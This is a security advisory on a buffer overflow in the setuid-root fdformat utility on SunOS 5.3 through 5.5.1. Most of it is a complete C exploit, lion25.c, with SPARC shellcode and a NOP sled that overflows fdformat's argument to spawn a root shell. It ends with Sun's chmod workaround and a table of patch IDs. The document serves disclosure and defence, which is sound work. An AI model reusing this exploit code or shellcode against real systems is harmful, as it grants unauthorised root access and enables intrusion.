COMMAND

    /bin/fdformat

SYSTEMS AFFECTED

    SunOS versions 5.3,  5.4, 5.5, 5.5_x86,  5.5.1, and 5.5.1_x86  are
    vulnerable.

PROBLEM

    fdformat(1) is a utility for formatting both diskettes and  PCMCIA
    memory cards.   Due to insufficient  bounds checking on  arguments
    which  are  supplied  by  users,  it  is possible to overwrite the
    internal  stack  space  of  the  fdformat  program  while  it   is
    executing.   By  supplying  a  carefully  designed argument to the
    fdformat  program,  intruders  may  be  able  to force fdformat to
    execute arbitrary commands.  As fdformat is setuid root, this  may
    allow intruders to run arbitrary commands with root privileges.

    The buffer overflow bug in find_media() posted by Cristian Schipor
    is present in /bin/fdformat too (distributions ship it with the
    suid-exec bit on, and it is owned by root). By exploiting fdformat
    with the suid-exec bit on, anyone can gain a shell as root (or as
    whoever owns fdformat).

    My exploits (argv[1] adjusts STACK_OFFSET by +-x, where x = 8*k,
    k = 1, 2, 3, ...):

    ------------------------- lion25.c -------------------------------
    /*
    Solaris 2.5.1 - this exploit was compiled on Solaris 2.4 and tested on
    2.5.1
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH 364
    #define EXTRA 400
    #define STACK_OFFSET 704
    #define SPARC_NOP 0xa61cc013

    u_char sparc_shellcode[] =

    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08"
    ;

    u_long get_sp(void)
    {
    __asm__("mov %sp,%i0 \n");
    }

    void main(int argc, char *argv[])
    {
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode),dso=0;

    if(argc > 1) dso=atoi(argv[1]);

    long_p =(u_long *) buf ;
    targ_addr = get_sp() - STACK_OFFSET - dso;
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

    char_p = (u_char *) long_p;

    for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

    long_p = (u_long *) char_p;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
    execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
    perror("execl failed");
    }

    ----------------------- end of lion25.c --------------------------

SOLUTION

    Sun recommends, as a workaround, that setuid permission be removed
    from the eject and fdformat programs by using commands such as the
    following (only the fdformat command is shown here):


        chmod 555 /usr/bin/fdformat

    The same vulnerabilities have  been fixed in the  upcoming release
    of Solaris 2.6.  The  vulnerabilities relating to fdformat in  the
    volume management library are fixed by the following patches:

        OS version              Patch ID
        ----------              --------
        SunOS 5.5.1             104776-01
        SunOS 5.5.1_x86         104777-01
        SunOS 5.5               103024-02
        SunOS 5.5_x86           103044-02
        SunOS 5.4               101907-14
        SunOS 5.4_x86           101908-14
        SunOS 5.3               101331-07